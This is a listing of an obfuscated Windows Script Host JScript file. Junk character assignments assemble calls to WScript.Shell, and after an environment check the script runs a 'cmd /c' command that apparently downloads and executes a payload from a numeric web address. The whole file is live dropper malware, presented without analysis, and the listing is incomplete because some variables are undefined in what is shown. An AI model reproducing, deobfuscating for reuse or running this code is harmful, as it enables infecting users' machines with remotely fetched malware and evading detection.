2 | var mkixygi = this[qqbjea + hseqexz + womre + kmiwm + fomhg + ndzijhrn + zloxedf + pgseevurl] ( this[clntuyfw + nkiauss + zmwzxherf + womre + iqngwygd + qqbjea + pgseevurl][qznuwavux + womre + fomhg + hseqexz + pgseevurl + fomhg + fbquxymu + wwhbrpvrh + ptxnvlg + fomhg + zmwzxherf + pgseevurl] ( clntuyfw + nkiauss + zmwzxherf + womre + iqngwygd + qqbjea + pgseevurl + bkpdmxw + nkiauss + lmywp + fomhg + rfrfamjw + rfrfamjw ) [xuekyc + fomhg + gfyjtu + xuekyc + fomhg + hseqexz + bizzjp] ( rossbwe + dtghkbl + svkax + nunesay + mxovhsy + qznuwavux + evluuioq + xuekyc + xuekyc + svkax + xpokymi + wvdccyk + mxovhsy + evluuioq + nkiauss + svkax + xuekyc + gmvzccr + qznuwavux + bdspek + zloxedf + pgseevurl + womre + bdspek + rfrfamjw + nfgvkf + ubfdk + hseqexz + zloxedf + fomhg + rfrfamjw + gmvzccr + ndzijhrn + zloxedf + pgseevurl + fomhg + womre + zloxedf + hseqexz + pgseevurl + iqngwygd + bdspek + zloxedf + hseqexz + rfrfamjw + gmvzccr + eydukfsbv + bdspek + zmwzxherf + hseqexz + rfrfamjw + fomhg ), 16 ); |
|
3 | for ( thyxq = 0 ; thyxq < ootwewud[rfrfamjw + fomhg + zloxedf + gfyjtu + pgseevurl + lmywp] ; ++ thyxq ) | |
4 | { | |
5 | if ( mkixygi == ootwewud[thyxq] ) | |
6 | { | |
7 | mkixygi = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( mkixygi !== true ) | |
12 | this[clntuyfw + nkiauss + zmwzxherf + womre + iqngwygd + qqbjea + pgseevurl][cdytkmg + qndoaxwz + iqngwygd + pgseevurl] ( ); | |
13 | this[clntuyfw + nkiauss + zmwzxherf + womre + iqngwygd + qqbjea + pgseevurl][qznuwavux + womre + fomhg + hseqexz + pgseevurl + fomhg + fbquxymu + wwhbrpvrh + ptxnvlg + fomhg + zmwzxherf + pgseevurl] ( clntuyfw + nkiauss + zmwzxherf + womre + iqngwygd + qqbjea + pgseevurl + bkpdmxw + nkiauss + lmywp + fomhg + rfrfamjw + rfrfamjw ) [womre + qndoaxwz + zloxedf] ( zmwzxherf + stluk + bizzjp + nfgvkf + qlbkyxue + zmwzxherf + nfgvkf + qqbjea + bdspek + ptcffgss + fomhg + womre + kmiwm + lmywp + fomhg + rfrfamjw + rfrfamjw + bkpdmxw + fomhg + hyiwml + fomhg + nfgvkf + ijbcnjlb + qznuwavux + bdspek + stluk + stluk + hseqexz + zloxedf + bizzjp + nfgvkf + ecxoywyt + ndzijhrn + zloxedf + eozjb + bdspek + lkxtxo + fomhg + ijbcnjlb + clntuyfw + fomhg + wwhbrpvrh + xuekyc + fomhg + dzjoh + qndoaxwz + fomhg + kmiwm + pgseevurl + nfgvkf + ijbcnjlb + fbquxymu + qndoaxwz + pgseevurl + kpdngr + iqngwygd + rfrfamjw + fomhg + nfgvkf + kyfswl + pgseevurl + fomhg + stluk + qqbjea + kyfswl + gmvzccr + iqngwygd + zloxedf + eozjb + bdspek + iqngwygd + zmwzxherf + fomhg + bkpdmxw + qqbjea + bizzjp + brqyeurtj + nfgvkf + lmywp + pgseevurl + pgseevurl + qqbjea + xidqhuto + qlbkyxue + qlbkyxue + flmunuv + znvonk + xyuiwrz + bkpdmxw + flmunuv + jsdzqrur + xyuiwrz + bkpdmxw + flmunuv + bkpdmxw + dyitw + gcxvz + eksknfdk + qlbkyxue + iqngwygd + zloxedf + eozjb + bdspek + iqngwygd + zmwzxherf + fomhg + bkpdmxw + qqbjea + lmywp + qqbjea + ecxoywyt + oytrie + oytrie + kmiwm + pgseevurl + hseqexz + womre + pgseevurl + nfgvkf + kyfswl + pgseevurl + fomhg + stluk + qqbjea + kyfswl + gmvzccr + iqngwygd + zloxedf + eozjb + bdspek + iqngwygd + zmwzxherf + fomhg + bkpdmxw + qqbjea + bizzjp + brqyeurtj + oytrie + oytrie + zmwzxherf + stluk + bizzjp + nfgvkf + qlbkyxue + zmwzxherf + nfgvkf + zloxedf + fomhg + pgseevurl + nfgvkf + qndoaxwz + kmiwm + fomhg + nfgvkf + gmvzccr + gmvzccr + flmunuv + znvonk + xyuiwrz + bkpdmxw + flmunuv + jsdzqrur + xyuiwrz + bkpdmxw + flmunuv + bkpdmxw + dyitw + gcxvz + eksknfdk + wavyhkwy + gweewmtse + gweewmtse + gweewmtse + gweewmtse + gmvzccr + bizzjp + hseqexz + eozjb + ptcffgss + ptcffgss + ptcffgss + womre + bdspek + bdspek + pgseevurl + gmvzccr + oytrie + oytrie + zmwzxherf + stluk + bizzjp + nfgvkf + qlbkyxue + zmwzxherf + nfgvkf + womre + fomhg + gfyjtu + kmiwm + eozjb + womre + xyuiwrz + dyitw + nfgvkf + qlbkyxue + kmiwm + nfgvkf + gmvzccr + gmvzccr + flmunuv + znvonk + xyuiwrz + bkpdmxw + flmunuv + jsdzqrur + xyuiwrz + bkpdmxw + flmunuv + bkpdmxw + dyitw + gcxvz + eksknfdk + wavyhkwy + gweewmtse + gweewmtse + gweewmtse + gweewmtse + gmvzccr + bizzjp + hseqexz + eozjb + ptcffgss + ptcffgss + ptcffgss + womre + bdspek + bdspek + pgseevurl + gmvzccr + eksknfdk + frcec + znvonk + flmunuv + flmunuv + gweewmtse + gweewmtse + eksknfdk + xyuiwrz + flmunuv + flmunuv + flmunuv + frcec + flmunuv + bkpdmxw + bizzjp + rfrfamjw + rfrfamjw, 0, false ); |
|
14 | } | |
15 | xuekyc = "p"; | |
16 | xuekyc = "f"; | |
17 | xuekyc = "e"; | |
18 | xuekyc = "G"; | |
19 | xuekyc = "f"; | |
20 | xuekyc = "p"; | |
21 | xuekyc = "n"; | |
22 | xuekyc = "x"; | |
23 | xuekyc = "p"; | |
24 | xuekyc = "h"; | |
25 | xuekyc = "l"; | |
26 | xuekyc = "K"; | |
27 | xuekyc = "R"; | |
28 | eozjb = "b"; | |
29 | eozjb = "z"; | |
30 | eozjb = "c"; | |
31 | eozjb = "y"; | |
32 | eozjb = "w"; | |
33 | eozjb = "R"; | |
34 | eozjb = "p"; | |
35 | eozjb = "r"; | |
36 | eozjb = "i"; | |
37 | eozjb = "O"; | |
38 | eozjb = "V"; | |
39 | eozjb = "b"; | |
40 | eozjb = "W"; | |
41 | eozjb = "l"; | |
42 | eozjb = "l"; | |
43 | eozjb = "b"; | |
44 | eozjb = "u"; | |
45 | eozjb = "F"; | |
46 | eozjb = "b"; | |
47 | eozjb = "F"; | |
48 | eozjb = "f"; | |
49 | eozjb = "b"; | |
50 | eozjb = "i"; | |
51 | eozjb = "I"; | |
52 | eozjb = "T"; | |
53 | eozjb = "u"; | |
54 | eozjb = "q"; | |
55 | eozjb = "d"; | |
56 | eozjb = "Y"; | |
57 | eozjb = "Z"; | |
58 | eozjb = "U"; | |
59 | eozjb = "E"; | |
60 | eozjb = "y"; | |
61 | eozjb = "V"; | |
62 | eozjb = "W"; | |
63 | eozjb = "N"; | |
64 | eozjb = "c"; | |
65 | eozjb = "H"; | |
66 | eozjb = "x"; | |
67 | eozjb = "P"; | |
68 | eozjb = "F"; | |
69 | eozjb = "P"; | |
70 | eozjb = "v"; | |
71 | nunesay = "i"; | |
72 | nunesay = "Z"; | |
73 | nunesay = "x"; | |
74 | nunesay = "A"; | |
75 | nunesay = "a"; | |
76 | nunesay = "j"; | |
77 | nunesay = "k"; | |
78 | nunesay = "M"; | |
79 | nunesay = "S"; | |
80 | nunesay = "h"; | |
81 | nunesay = "Q"; | |
82 | nunesay = "c"; | |
83 | nunesay = "I"; | |
84 | nunesay = "E"; | |
85 | nunesay = "P"; | |
86 | nunesay = "w"; | |
87 | nunesay = "F"; | |
88 | nunesay = "c"; | |
89 | nunesay = "R"; | |
90 | nunesay = "Y"; | |
91 | nunesay = "d"; | |
92 | nunesay = "C"; | |
93 | nunesay = "B"; | |
94 | nunesay = "R"; | |
95 | nunesay = "r"; | |
96 | nunesay = "J"; | |
97 | nunesay = "F"; | |
98 | nunesay = "z"; | |
99 | nunesay = "Q"; | |
100 | nunesay = "f"; | |
101 | nunesay = "i"; | |
102 | nunesay = "U"; | |
103 | nunesay = "Y"; | |
104 | fomhg = "S"; | |
105 | fomhg = "q"; | |
106 | fomhg = "M"; | |
107 | fomhg = "Z"; | |
108 | fomhg = "v"; | |
109 | fomhg = "V"; | |
110 | fomhg = "e"; | |
111 | xidqhuto = "L"; | |
112 | xidqhuto = "c"; | |
113 | xidqhuto = "Z"; | |
114 | xidqhuto = "a"; | |
115 | xidqhuto = "r"; | |
116 | xidqhuto = "g"; | |
117 | xidqhuto = "M"; | |
118 | xidqhuto = "P"; | |
119 | xidqhuto = "Z"; | |
120 | xidqhuto = "o"; | |
121 | xidqhuto = "u"; | |
122 | xidqhuto = ":"; | |
123 | zmwzxherf = "d"; | |
124 | zmwzxherf = "A"; | |
125 | zmwzxherf = "x"; | |
126 | zmwzxherf = "c"; | |
127 | zmwzxherf = "s"; | |
128 | zmwzxherf = "a"; | |
129 | zmwzxherf = "A"; | |
130 | zmwzxherf = "L"; | |
131 | zmwzxherf = "y"; | |
132 | zmwzxherf = "A"; | |
133 | zmwzxherf = "Q"; | |
134 | zmwzxherf = "g"; | |
135 | zmwzxherf = "z"; | |
136 | zmwzxherf = "X"; | |
137 | zmwzxherf = "i"; | |
138 | zmwzxherf = "W"; | |
139 | zmwzxherf = "g"; | |
140 | zmwzxherf = "h"; | |
141 | zmwzxherf = "z"; | |
142 | zmwzxherf = "i"; | |
143 | zmwzxherf = "R"; | |
144 | zmwzxherf = "i"; | |
145 | zmwzxherf = "m"; | |
146 | zmwzxherf = "Q"; | |
147 | zmwzxherf = "A"; | |
148 | zmwzxherf = "f"; | |
149 | zmwzxherf = "r"; | |
150 | zmwzxherf = "i"; | |
151 | zmwzxherf = "r"; | |
152 | zmwzxherf = "e"; | |
153 | zmwzxherf = "B"; | |
154 | zmwzxherf = "c"; | |
155 | ndzijhrn = "r"; | |
156 | ndzijhrn = "z"; | |
157 | ndzijhrn = "K"; | |
158 | ndzijhrn = "a"; | |
159 | ndzijhrn = "k"; | |
160 | ndzijhrn = "D"; | |
161 | ndzijhrn = "S"; | |
162 | ndzijhrn = "q"; | |
163 | ndzijhrn = "V"; | |
164 | ndzijhrn = "y"; | |
165 | ndzijhrn = "H"; | |
166 | ndzijhrn = "a"; | |
167 | ndzijhrn = "Y"; | |
168 | ndzijhrn = "S"; | |
169 | ndzijhrn = "x"; | |
170 | ndzijhrn = "j"; | |
171 | ndzijhrn = "a"; | |
172 | ndzijhrn = "g"; | |
173 | ndzijhrn = "O"; | |
174 | ndzijhrn = "e"; | |
175 | ndzijhrn = "N"; | |
176 | ndzijhrn = "g"; | |
177 | ndzijhrn = "X"; | |
178 | ndzijhrn = "N"; | |
179 | ndzijhrn = "H"; | |
180 | ndzijhrn = "f"; | |
181 | ndzijhrn = "p"; | |
182 | ndzijhrn = "U"; | |
183 | ndzijhrn = "m"; | |
184 | ndzijhrn = "n"; | |
185 | ndzijhrn = "N"; | |
186 | ndzijhrn = "X"; | |
187 | ndzijhrn = "I"; | |
188 | gweewmtse = "y"; | |
189 | gweewmtse = "I"; | |
190 | gweewmtse = "y"; | |
191 | gweewmtse = "y"; | |
192 | gweewmtse = "Q"; | |
193 | gweewmtse = "X"; | |
194 | gweewmtse = "o"; | |
195 | gweewmtse = "G"; | |
196 | gweewmtse = "C"; | |
197 | gweewmtse = "g"; | |
198 | gweewmtse = "s"; | |
199 | gweewmtse = "L"; | |
200 | gweewmtse = "m"; | |
201 | gweewmtse = "J"; | |
202 | gweewmtse = "Y"; | |
203 | gweewmtse = "D"; | |
204 | gweewmtse = "Z"; | |
205 | gweewmtse = "t"; | |
206 | gweewmtse = "j"; | |
207 | gweewmtse = "f"; | |
208 | gweewmtse = "t"; | |
209 | gweewmtse = "U"; | |
210 | gweewmtse = "V"; | |
211 | gweewmtse = "O"; | |
212 | gweewmtse = "s"; | |
213 | gweewmtse = "x"; | |
214 | gweewmtse = "N"; | |
215 | gweewmtse = "k"; | |
216 | gweewmtse = "s"; | |
217 | gweewmtse = "n"; | |
218 | gweewmtse = "k"; | |
219 | gweewmtse = "r"; | |
220 | gweewmtse = "B"; | |
221 | gweewmtse = "Z"; | |
222 | gweewmtse = "s"; | |
223 | gweewmtse = "j"; | |
224 | gweewmtse = "D"; | |
225 | gweewmtse = "u"; | |
226 | gweewmtse = "k"; | |
227 | gweewmtse = "K"; | |
228 | gweewmtse = "w"; | |
229 | gweewmtse = "V"; | |
230 | gweewmtse = "8"; | |
231 | znvonk = "F"; | |
232 | znvonk = "P"; | |
233 | znvonk = "l"; | |
234 | znvonk = "Y"; | |
235 | znvonk = "9"; | |
236 | nfgvkf = "Z"; | |
237 | nfgvkf = "j"; | |
238 | nfgvkf = "y"; | |
239 | nfgvkf = "b"; | |
240 | nfgvkf = "c"; | |
241 | nfgvkf = "w"; | |
242 | nfgvkf = "g"; | |
243 | nfgvkf = "T"; | |
244 | nfgvkf = "P"; | |
245 | nfgvkf = "b"; | |
246 | nfgvkf = "F"; | |
247 | nfgvkf = "b"; | |
248 | nfgvkf = "A"; | |
249 | nfgvkf = "i"; | |
250 | nfgvkf = "z"; | |
251 | nfgvkf = "T"; | |
252 | nfgvkf = "P"; | |
253 | nfgvkf = "N"; | |
254 | nfgvkf = "F"; | |
255 | nfgvkf = "K"; | |
256 | nfgvkf = "R"; | |
257 | nfgvkf = "B"; | |
258 | nfgvkf = "c"; | |
259 | nfgvkf = "Z"; | |
260 | nfgvkf = "v"; | |
261 | nfgvkf = "L"; | |
262 | nfgvkf = "p"; | |
263 | nfgvkf = "g"; | |
264 | nfgvkf = " "; | |
265 | ptcffgss = "S"; | |
266 | ptcffgss = "q"; | |
267 | ptcffgss = "f"; | |
268 | ptcffgss = "l"; | |
269 | ptcffgss = "g"; | |
270 | ptcffgss = "m"; | |
271 | ptcffgss = "Q"; | |
272 | ptcffgss = "F"; | |
273 | ptcffgss = "C"; | |
274 | ptcffgss = "C"; | |
275 | ptcffgss = "k"; | |
276 | ptcffgss = "r"; | |
277 | ptcffgss = "a"; | |
278 | ptcffgss = "J"; | |
279 | ptcffgss = "w"; | |
280 | ptcffgss = "l"; | |
281 | ptcffgss = "r"; | |
282 | ptcffgss = "D"; | |
283 | ptcffgss = "P"; | |
284 | ptcffgss = "v"; | |
285 | ptcffgss = "k"; | |
286 | ptcffgss = "T"; | |
287 | ptcffgss = "j"; | |
288 | ptcffgss = "f"; | |
289 | ptcffgss = "I"; | |
290 | ptcffgss = "d"; | |
291 | ptcffgss = "S"; | |
292 | ptcffgss = "V"; | |
293 | ptcffgss = "Z"; | |
294 | ptcffgss = "o"; | |
295 | ptcffgss = "w"; | |
296 | wvdccyk = "m"; | |
297 | wvdccyk = "V"; | |
298 | wvdccyk = "s"; | |
299 | wvdccyk = "z"; | |
300 | wvdccyk = "C"; | |
301 | wvdccyk = "P"; | |
302 | wvdccyk = "e"; | |
303 | wvdccyk = "X"; | |
304 | wvdccyk = "I"; | |
305 | wvdccyk = "d"; | |
306 | wvdccyk = "A"; | |
307 | wvdccyk = "m"; | |
308 | wvdccyk = "G"; | |
309 | wvdccyk = "q"; | |
310 | wvdccyk = "c"; | |
311 | wvdccyk = "d"; | |
312 | wvdccyk = "g"; | |
313 | wvdccyk = "u"; | |
314 | wvdccyk = "m"; | |
315 | wvdccyk = "F"; | |
316 | wvdccyk = "t"; | |
317 | wvdccyk = "V"; | |
318 | wvdccyk = "X"; | |
319 | wvdccyk = "J"; | |
320 | wvdccyk = "n"; | |
321 | wvdccyk = "r"; | |
322 | wvdccyk = "u"; | |
323 | wvdccyk = "T"; | |
324 | lkxtxo = "T"; | |
325 | lkxtxo = "L"; | |
326 | lkxtxo = "h"; | |
327 | lkxtxo = "o"; | |
328 | lkxtxo = "j"; | |
329 | lkxtxo = "d"; | |
330 | lkxtxo = "v"; | |
331 | lkxtxo = "X"; | |
332 | lkxtxo = "L"; | |
333 | lkxtxo = "d"; | |
334 | lkxtxo = "A"; | |
335 | lkxtxo = "j"; | |
336 | lkxtxo = "C"; | |
337 | lkxtxo = "m"; | |
338 | lkxtxo = "k"; | |
339 | bkpdmxw = "u"; | |
340 | bkpdmxw = "T"; | |
341 | bkpdmxw = "Y"; | |
342 | bkpdmxw = "O"; | |
343 | bkpdmxw = "l"; | |
344 | bkpdmxw = "c"; | |
345 | bkpdmxw = "R"; | |
346 | bkpdmxw = "C"; | |
347 | bkpdmxw = "S"; | |
348 | bkpdmxw = "Y"; | |
349 | bkpdmxw = "W"; | |
350 | bkpdmxw = "d"; | |
351 | bkpdmxw = "p"; | |
352 | bkpdmxw = "U"; | |
353 | bkpdmxw = "Y"; | |
354 | bkpdmxw = "i"; | |
355 | bkpdmxw = "l"; | |
356 | bkpdmxw = "J"; | |
357 | bkpdmxw = "e"; | |
358 | bkpdmxw = "o"; | |
359 | bkpdmxw = "M"; | |
360 | bkpdmxw = "F"; | |
361 | bkpdmxw = "A"; | |
362 | bkpdmxw = "X"; | |
363 | bkpdmxw = "i"; | |
364 | bkpdmxw = "I"; | |
365 | bkpdmxw = "v"; | |
366 | bkpdmxw = "p"; | |
367 | bkpdmxw = "k"; | |
368 | bkpdmxw = "c"; | |
369 | bkpdmxw = "t"; | |
370 | bkpdmxw = "v"; | |
371 | bkpdmxw = "M"; | |
372 | bkpdmxw = "h"; | |
373 | bkpdmxw = "a"; | |
374 | bkpdmxw = "G"; | |
375 | bkpdmxw = "W"; | |
376 | bkpdmxw = "."; | |
377 | ijbcnjlb = "Z"; | |
378 | ijbcnjlb = "w"; | |
379 | ijbcnjlb = "r"; | |
380 | ijbcnjlb = "t"; | |
381 | ijbcnjlb = "g"; | |
382 | ijbcnjlb = "i"; | |
383 | ijbcnjlb = "l"; | |
384 | ijbcnjlb = "d"; | |
385 | ijbcnjlb = "I"; | |
386 | ijbcnjlb = "w"; | |
387 | ijbcnjlb = "y"; | |
388 | ijbcnjlb = "k"; | |
389 | ijbcnjlb = "-"; | |
390 | nkiauss = "y"; | |
391 | nkiauss = "t"; | |
392 | nkiauss = "P"; | |
393 | nkiauss = "h"; | |
394 | nkiauss = "F"; | |
395 | nkiauss = "o"; | |
396 | nkiauss = "t"; | |
397 | nkiauss = "A"; | |
398 | nkiauss = "A"; | |
399 | nkiauss = "d"; | |
400 | nkiauss = "y"; | |
401 | nkiauss = "T"; | |
402 | nkiauss = "C"; | |
403 | nkiauss = "e"; | |
404 | nkiauss = "T"; | |
405 | nkiauss = "W"; | |
406 | nkiauss = "K"; | |
407 | nkiauss = "r"; | |
408 | nkiauss = "S"; | |
409 | nkiauss = "a"; | |
410 | nkiauss = "T"; | |
411 | nkiauss = "K"; | |
412 | nkiauss = "J"; | |
413 | nkiauss = "Z"; | |
414 | nkiauss = "X"; | |
415 | nkiauss = "A"; | |
416 | nkiauss = "b"; | |
417 | nkiauss = "b"; | |
418 | nkiauss = "u"; | |
419 | nkiauss = "y"; | |
420 | nkiauss = "w"; | |
421 | nkiauss = "m"; | |
422 | nkiauss = "S"; | |
423 | nkiauss = "a"; | |
424 | nkiauss = "i"; | |
425 | nkiauss = "P"; | |
426 | nkiauss = "s"; | |
427 | nkiauss = "a"; | |
428 | nkiauss = "O"; | |
429 | nkiauss = "Y"; | |
430 | nkiauss = "T"; | |
431 | nkiauss = "N"; | |
432 | nkiauss = "S"; | |
433 | ecxoywyt = "d"; | |
434 | ecxoywyt = "Z"; | |
435 | ecxoywyt = "w"; | |
436 | ecxoywyt = "S"; | |
437 | ecxoywyt = "n"; | |
438 | ecxoywyt = "O"; | |
439 | ecxoywyt = "n"; | |
440 | ecxoywyt = "w"; | |
441 | ecxoywyt = "u"; | |
442 | ecxoywyt = "l"; | |
443 | ecxoywyt = "E"; | |
444 | ecxoywyt = "u"; | |
445 | ecxoywyt = "J"; | |
446 | ecxoywyt = "V"; | |
447 | ecxoywyt = "V"; | |
448 | ecxoywyt = "k"; | |
449 | ecxoywyt = "\""; | |
450 | rossbwe = "M"; | |
451 | rossbwe = "W"; | |
452 | rossbwe = "Q"; | |
453 | rossbwe = "n"; | |
454 | rossbwe = "m"; | |
455 | rossbwe = "d"; | |
456 | rossbwe = "W"; | |
457 | rossbwe = "j"; | |
458 | rossbwe = "Q"; | |
459 | rossbwe = "j"; | |
460 | rossbwe = "z"; | |
461 | rossbwe = "S"; | |
462 | rossbwe = "e"; | |
463 | rossbwe = "A"; | |
464 | rossbwe = "A"; | |
465 | rossbwe = "A"; | |
466 | rossbwe = "Z"; | |
467 | rossbwe = "w"; | |
468 | rossbwe = "L"; | |
469 | rossbwe = "W"; | |
470 | rossbwe = "k"; | |
471 | rossbwe = "E"; | |
472 | rossbwe = "b"; | |
473 | rossbwe = "O"; | |
474 | rossbwe = "u"; | |
475 | rossbwe = "Z"; | |
476 | rossbwe = "q"; | |
477 | rossbwe = "d"; | |
478 | rossbwe = "n"; | |
479 | rossbwe = "p"; | |
480 | rossbwe = "l"; | |
481 | rossbwe = "K"; | |
482 | rossbwe = "g"; | |
483 | rossbwe = "b"; | |
484 | rossbwe = "H"; | |
485 | fbquxymu = "j"; | |
486 | fbquxymu = "d"; | |
487 | fbquxymu = "l"; | |
488 | fbquxymu = "q"; | |
489 | fbquxymu = "Q"; | |
490 | fbquxymu = "O"; | |
491 | kyfswl = "Q"; | |
492 | kyfswl = "m"; | |
493 | kyfswl = "u"; | |
494 | kyfswl = "B"; | |
495 | kyfswl = "V"; | |
496 | kyfswl = "p"; | |
497 | kyfswl = "u"; | |
498 | kyfswl = "i"; | |
499 | kyfswl = "g"; | |
500 | kyfswl = "t"; | |
501 | kyfswl = "O"; | |
502 | kyfswl = "A"; | |
503 | kyfswl = "x"; | |
504 | kyfswl = "E"; | |
505 | kyfswl = "v"; | |
506 | kyfswl = "j"; | |
507 | kyfswl = "N"; | |
508 | kyfswl = "M"; | |
509 | kyfswl = "P"; | |
510 | kyfswl = "x"; | |
511 | kyfswl = "I"; | |
512 | kyfswl = "r"; | |
513 | kyfswl = "t"; | |
514 | kyfswl = "s"; | |
515 | kyfswl = "u"; | |
516 | kyfswl = "v"; | |
517 | kyfswl = "v"; | |
518 | kyfswl = "R"; | |
519 | kyfswl = "h"; | |
520 | kyfswl = "u"; | |
521 | kyfswl = "J"; | |
522 | kyfswl = "s"; | |
523 | kyfswl = "%"; | |
524 | gfyjtu = "Y"; | |
525 | gfyjtu = "a"; | |
526 | gfyjtu = "p"; | |
527 | gfyjtu = "y"; | |
528 | gfyjtu = "W"; | |
529 | gfyjtu = "r"; | |
530 | gfyjtu = "n"; | |
531 | gfyjtu = "G"; | |
532 | gfyjtu = "H"; | |
533 | gfyjtu = "Q"; | |
534 | gfyjtu = "Y"; | |
535 | gfyjtu = "g"; | |
536 | gfyjtu = "R"; | |
537 | gfyjtu = "N"; | |
538 | gfyjtu = "j"; | |
539 | gfyjtu = "F"; | |
540 | gfyjtu = "w"; | |
541 | gfyjtu = "J"; | |
542 | gfyjtu = "d"; | |
543 | gfyjtu = "t"; | |
544 | gfyjtu = "A"; | |
545 | gfyjtu = "R"; | |
546 | gfyjtu = "y"; | |
547 | gfyjtu = "o"; | |
548 | gfyjtu = "X"; | |
549 | gfyjtu = "y"; | |
550 | gfyjtu = "p"; | |
551 | gfyjtu = "Y"; | |
552 | gfyjtu = "t"; | |
553 | gfyjtu = "q"; | |
554 | gfyjtu = "U"; | |
555 | gfyjtu = "Z"; | |
556 | gfyjtu = "h"; | |
557 | gfyjtu = "g"; | |
558 | frcec = "f"; | |
559 | frcec = "t"; | |
560 | frcec = "J"; | |
561 | frcec = "d"; | |
562 | frcec = "e"; | |
563 | frcec = "J"; | |
564 | frcec = "E"; | |
565 | frcec = "n"; | |
566 | frcec = "m"; | |
567 | frcec = "f"; | |
568 | frcec = "R"; | |
569 | frcec = "f"; | |
570 | frcec = "a"; | |
571 | frcec = "f"; | |
572 | frcec = "d"; | |
573 | frcec = "M"; | |
574 | frcec = "L"; | |
575 | frcec = "W"; | |
576 | frcec = "z"; | |
577 | frcec = "A"; | |
578 | frcec = "o"; | |
579 | frcec = "H"; | |
580 | frcec = "W"; | |
581 | frcec = "H"; | |
582 | frcec = "a"; | |
583 | frcec = "n"; | |
584 | frcec = "t"; | |
585 | frcec = "h"; | |
586 | frcec = "z"; | |
587 | frcec = "Z"; | |
588 | frcec = "j"; | |
589 | frcec = "7"; | |
590 | stluk = "x"; | |
591 | stluk = "D"; | |
592 | stluk = "k"; | |
593 | stluk = "t"; | |
594 | stluk = "v"; | |
595 | stluk = "K"; | |
596 | stluk = "M"; | |
597 | stluk = "p"; | |
598 | stluk = "C"; | |
599 | stluk = "w"; | |
600 | stluk = "C"; | |
601 | stluk = "H"; | |
602 | stluk = "m"; | |
603 | stluk = "U"; | |
604 | stluk = "J"; | |
605 | stluk = "S"; | |
606 | stluk = "k"; | |
607 | stluk = "q"; | |
608 | stluk = "n"; | |
609 | stluk = "z"; | |
610 | stluk = "U"; | |
611 | stluk = "p"; | |
612 | stluk = "i"; | |
613 | stluk = "a"; | |
614 | stluk = "v"; | |
615 | stluk = "R"; | |
616 | stluk = "l"; | |
617 | stluk = "D"; | |
618 | stluk = "j"; | |
619 | stluk = "L"; | |
620 | stluk = "I"; | |
621 | stluk = "X"; | |
622 | stluk = "m"; | |
623 | dtghkbl = "n"; | |
624 | dtghkbl = "j"; | |
625 | dtghkbl = "F"; | |
626 | dtghkbl = "O"; | |
627 | dtghkbl = "Z"; | |
628 | dtghkbl = "f"; | |
629 | dtghkbl = "v"; | |
630 | dtghkbl = "U"; | |
631 | dtghkbl = "h"; | |
632 | dtghkbl = "E"; | |
633 | dtghkbl = "O"; | |
634 | dtghkbl = "X"; | |
635 | dtghkbl = "C"; | |
636 | dtghkbl = "O"; | |
637 | dtghkbl = "k"; | |
638 | dtghkbl = "e"; | |
639 | dtghkbl = "e"; | |
640 | dtghkbl = "F"; | |
641 | dtghkbl = "r"; | |
642 | dtghkbl = "v"; | |
643 | dtghkbl = "D"; | |
644 | dtghkbl = "T"; | |
645 | dtghkbl = "O"; | |
646 | dtghkbl = "V"; | |
647 | dtghkbl = "S"; | |
648 | dtghkbl = "O"; | |
649 | dtghkbl = "l"; | |
650 | dtghkbl = "l"; | |
651 | dtghkbl = "m"; | |
652 | dtghkbl = "y"; | |
653 | dtghkbl = "i"; | |
654 | dtghkbl = "A"; | |
655 | dtghkbl = "B"; | |
656 | dtghkbl = "t"; | |
657 | dtghkbl = "e"; | |
658 | dtghkbl = "K"; | |
659 | dyitw = "X"; | |
660 | dyitw = "z"; | |
661 | dyitw = "c"; | |
662 | dyitw = "t"; | |
663 | dyitw = "a"; | |
664 | dyitw = "R"; | |
665 | dyitw = "M"; | |
666 | dyitw = "o"; | |
667 | dyitw = "b"; | |
668 | dyitw = "B"; | |
669 | dyitw = "T"; | |
670 | dyitw = "2"; | |
671 | qqbjea = "w"; | |
672 | qqbjea = "m"; | |
673 | qqbjea = "p"; | |
674 | ptxnvlg = "n"; | |
675 | ptxnvlg = "r"; | |
676 | ptxnvlg = "F"; | |
677 | ptxnvlg = "v"; | |
678 | ptxnvlg = "J"; | |
679 | ptxnvlg = "A"; | |
680 | ptxnvlg = "B"; | |
681 | ptxnvlg = "R"; | |
682 | ptxnvlg = "j"; | |
683 | kpdngr = "z"; | |
684 | kpdngr = "G"; | |
685 | kpdngr = "H"; | |
686 | kpdngr = "X"; | |
687 | kpdngr = "S"; | |
688 | kpdngr = "I"; | |
689 | kpdngr = "F"; | |
690 | gmvzccr = "y"; | |
691 | gmvzccr = "Z"; | |
692 | gmvzccr = "r"; | |
693 | gmvzccr = "E"; | |
694 | gmvzccr = "C"; | |
695 | gmvzccr = "o"; | |
696 | gmvzccr = "y"; | |
697 | gmvzccr = "i"; | |
698 | gmvzccr = "M"; | |
699 | gmvzccr = "k"; | |
700 | gmvzccr = "E"; | |
701 | gmvzccr = "N"; | |
702 | gmvzccr = "w"; | |
703 | gmvzccr = "J"; | |
704 | gmvzccr = "B"; | |
705 | gmvzccr = "\\"; | |
706 | clntuyfw = "w"; | |
707 | clntuyfw = "O"; | |
708 | clntuyfw = "n"; | |
709 | clntuyfw = "C"; | |
710 | clntuyfw = "z"; | |
711 | clntuyfw = "f"; | |
712 | clntuyfw = "w"; | |
713 | clntuyfw = "o"; | |
714 | clntuyfw = "g"; | |
715 | clntuyfw = "X"; | |
716 | clntuyfw = "R"; | |
717 | clntuyfw = "R"; | |
718 | clntuyfw = "l"; | |
719 | clntuyfw = "P"; | |
720 | clntuyfw = "S"; | |
721 | clntuyfw = "H"; | |
722 | clntuyfw = "M"; | |
723 | clntuyfw = "T"; | |
724 | clntuyfw = "r"; | |
725 | clntuyfw = "d"; | |
726 | clntuyfw = "i"; | |
727 | clntuyfw = "A"; | |
728 | clntuyfw = "U"; | |
729 | clntuyfw = "q"; | |
730 | clntuyfw = "Z"; | |
731 | clntuyfw = "b"; | |
732 | clntuyfw = "u"; | |
733 | clntuyfw = "G"; | |
734 | clntuyfw = "W"; | |
735 | ubfdk = "F"; | |
736 | ubfdk = "S"; | |
737 | ubfdk = "p"; | |
738 | ubfdk = "E"; | |
739 | ubfdk = "f"; | |
740 | ubfdk = "b"; | |
741 | ubfdk = "E"; | |
742 | ubfdk = "J"; | |
743 | ubfdk = "e"; | |
744 | ubfdk = "j"; | |
745 | ubfdk = "s"; | |
746 | ubfdk = "S"; | |
747 | ubfdk = "F"; | |
748 | ubfdk = "O"; | |
749 | ubfdk = "Q"; | |
750 | ubfdk = "S"; | |
751 | ubfdk = "E"; | |
